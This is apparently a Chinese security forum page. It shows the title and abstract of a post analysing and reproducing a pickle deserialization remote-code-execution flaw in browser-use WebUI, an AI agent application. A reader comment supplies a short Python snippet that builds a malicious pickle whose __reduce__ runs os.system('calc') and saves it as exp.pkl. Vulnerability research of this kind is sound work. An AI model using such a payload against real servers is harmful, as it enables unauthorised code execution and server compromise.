【热点】browser-use WebUI pickle 反序列化漏洞分析与复现

browser-use WebUI是基于browser-use的AI Agent应用,存在一个pickle反序列化漏洞,未经授权的远程攻击者可以利用该接口发送恶意的序列化数据,实现在服务端执行任意代码,导致服务器失陷。
  • 发表于 2025-05-06 16:25:45
  • 阅读 ( 2193 )
  • 分类:Web应用

1 条评论

ph0ebus
不用fickling也可以,直接用pickle序列化生成 import pickle import os class Test(object): def __reduce__(self): return (os.system,('calc',)) payload = pickle.dumps(Test(), protocol=0) open('exp.pkl',"wb").write(payload)
请先 登录 后评论
请先 登录 后评论
reset
reset

3 篇文章